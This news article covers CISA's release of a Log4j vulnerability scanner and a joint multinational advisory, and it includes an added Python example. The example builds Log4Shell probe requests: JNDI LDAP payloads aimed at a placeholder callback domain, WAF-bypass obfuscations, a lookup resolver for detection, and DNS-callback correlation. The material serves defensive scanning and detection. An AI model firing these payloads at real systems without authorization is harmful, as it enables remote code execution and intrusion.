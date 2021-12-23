The Cybersecurity and Infrastructure Security Agency (CISA) has announced the launch of a scanner to identify web services affected by two Apache Log4j remote code execution vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046.

“This repository provides a scanning solution for log4j remote code execution vulnerabilities (CVE-2021-44228 and CVE-2021-45046). The information and code in this repository is provided ‘as is’ and was brought together with the help of the open source community and updated by CISA in collaboration with the cybersecurity community in general,” reads the repository's description.

We published an open-sourced log4j-scanner derived from scanners created by other members of the open-source community. This tool is intended to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities: https://t.co/af8uszW8K4 – Cybersecurity and Infrastructure Security Agency (@CISAgov) December 21, 2021

The tool allows security teams to scan lists of hosts for exposure to the Log4j RCE vulnerabilities and to detect web application firewall (WAF) bypasses that may allow code execution within the organization's environment.

CISA highlights the following features on the log4j-scanner project page:

Support for lists of URLs.

Fuzzing for more than 60 HTTP request headers (not just the 3-4 headers covered by previously seen tools).

Fuzzing for HTTP POST data parameters.

Fuzzing for JSON data parameters.

Supports DNS callback for vulnerability discovery and validation.

WAF Bypass payloads.

Screenshot of log4j-scanner | Source: GitHub
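The feature list above describes the scan pattern rather than showing it. The following is an added example, written for this page and not code from CISA's log4j-scanner or any of the scanners it was derived from. It builds one probe per URL and injection point (request headers, POST form fields, JSON fields), tags every probe with a unique DNS-callback token so a query seen at the callback server can be traced back to the exact header or parameter that triggered it, and resolves log4j's nested lookups (`lower`, `upper`, `env`, the `:-default` fallback) the way the vulnerable library would, which is why the WAF-bypass payload variants never contain the literal string `${jndi:` on the wire. The callback domain `dns-callback.example`, the `Log4jScan` class, the header, parameter and field lists, the `L4S_UNSET` environment variable name and the DNS query log line are all assumptions constructed for the example; nothing is sent over the network.

```python
"""Added example (not CISA's log4j-scanner): builds tagged probes for
headers / POST / JSON injection points, correlates DNS callbacks back to
them, and canonicalizes WAF-bypass payloads by emulating log4j lookups."""
import json
import os
import re
import secrets
import urllib.parse

# Assumption: a DNS zone you control; a real scan reads its query log.
CALLBACK_DOMAIN = "dns-callback.example"

# Constructed subset of injection points a log4j-backed app tends to log.
HEADERS = ["User-Agent", "X-Forwarded-For", "Referer", "X-Api-Version",
           "Authorization", "Cookie", "X-Request-Id", "Origin", "Accept",
           "X-Real-IP", "True-Client-IP", "Forwarded"]
POST_PARAMS = ["username", "email", "q"]
JSON_FIELDS = ["username", "email", "query"]

# Payload templates; TOKEN is substituted per probe. The first is the plain
# form; the others use log4j lookups so '${jndi:' only appears after the
# vulnerable library itself reassembles the string.
PAYLOADS = [
    "${jndi:ldap://TOKEN." + CALLBACK_DOMAIN + "/a}",
    "${${lower:j}ndi:${lower:l}dap://TOKEN." + CALLBACK_DOMAIN + "/a}",
    "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://TOKEN." + CALLBACK_DOMAIN + "/a}",
    "${${env:L4S_UNSET:-j}ndi${env:L4S_UNSET:-:}ldap://TOKEN." + CALLBACK_DOMAIN + "/a}",
]

_INNERMOST = re.compile(r"\$\{([^${}]*)\}")   # a ${...} with no nested lookup


def _resolve_one(body):
    """Evaluate one innermost lookup body: 'prefix:key' with optional ':-default'."""
    expr, default = (body.split(":-", 1) + [None])[:2]
    prefix, _, key = expr.partition(":")
    prefix = prefix.lower()                    # log4j lowercases the prefix
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    if prefix == "env" and key in os.environ:
        return os.environ[key]
    if prefix == "jndi":
        return "${" + body + "}"               # terminal form we want to see
    return default if default is not None else "${" + body + "}"


def resolve_lookups(text):
    """Collapse nested lookups innermost-first until nothing changes."""
    while True:
        new = _INNERMOST.sub(lambda m: _resolve_one(m.group(1)), text)
        if new == text:
            return new
        text = new


def is_log4shell_probe(text):
    """True if the string becomes a JNDI lookup once log4j resolves it."""
    return "${jndi:" in resolve_lookups(text).lower()


class Log4jScan:
    """Probe builder plus DNS-callback correlator (nothing is sent here)."""

    def __init__(self, callback_domain=CALLBACK_DOMAIN):
        self.domain = callback_domain
        self.run_id = secrets.token_hex(2)     # 4 hex chars shared by one run
        self.registry = {}                     # token -> (url, injection point)

    def _token(self, url, point):
        token = f"{self.run_id}{len(self.registry):04x}"   # 8 hex chars, unique
        self.registry[token] = (url, point)
        return token

    def build_probes(self, urls, template):
        """One request per URL x injection point, each carrying its own token."""
        probes = []
        for url in urls:
            for h in HEADERS:
                payload = template.replace("TOKEN", self._token(url, f"header:{h}"))
                probes.append({"method": "GET", "url": url, "headers": {h: payload}})
            for p in POST_PARAMS:
                payload = template.replace("TOKEN", self._token(url, f"post:{p}"))
                probes.append({"method": "POST", "url": url,
                               "headers": {"Content-Type": "application/x-www-form-urlencoded"},
                               "body": urllib.parse.urlencode({p: payload})})
            for f in JSON_FIELDS:
                payload = template.replace("TOKEN", self._token(url, f"json:{f}"))
                probes.append({"method": "POST", "url": url,
                               "headers": {"Content-Type": "application/json"},
                               "body": json.dumps({f: payload})})
        return probes

    def correlate(self, dns_query_log):
        """Map callback hostnames in a DNS query log back to (url, point)."""
        pat = re.compile(r"\b([0-9a-f]{8})\." + re.escape(self.domain) + r"\b")
        hits = []
        for line in dns_query_log.splitlines():
            for token in pat.findall(line):
                if token in self.registry and self.registry[token] not in hits:
                    hits.append(self.registry[token])
        return hits


if __name__ == "__main__":
    scan = Log4jScan()
    probes = scan.build_probes(["https://app.example/login"], PAYLOADS[2])
    print(len(probes), "probes; first:", probes[0]["headers"])
    token = next(iter(scan.registry))
    # Constructed DNS query log line in the style of an authoritative server.
    log = f"21-Dec-2021 10:00:00 client 198.51.100.7#53: query: {token}.{CALLBACK_DOMAIN} IN A +"
    print("confirmed:", scan.correlate(log))
    for p in PAYLOADS:
        print(is_log4shell_probe(p), resolve_lookups(p))
```

The same `resolve_lookups` logic is useful on the defensive side: a WAF or log-based detector that matches only the literal `${jndi:` misses every bypass variant, while one that resolves the lookups first sees all four templates collapse to the same `${jndi:ldap://...}` string.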

Joining forces against Log4j.

Apart from this tool, the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the National Security Agency (NSA), the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand Computer Emergency Response Team (CERT NZ), the New Zealand National Cyber Security Centre (NZ NCSC) and the UK National Cyber Security Centre (NCSC-UK) have issued a joint advisory providing mitigation guidance for the vulnerabilities in Apache's Log4j software library: CVE-2021-44228 (known as “Log4Shell”), CVE-2021-45046 and CVE-2021-45105.

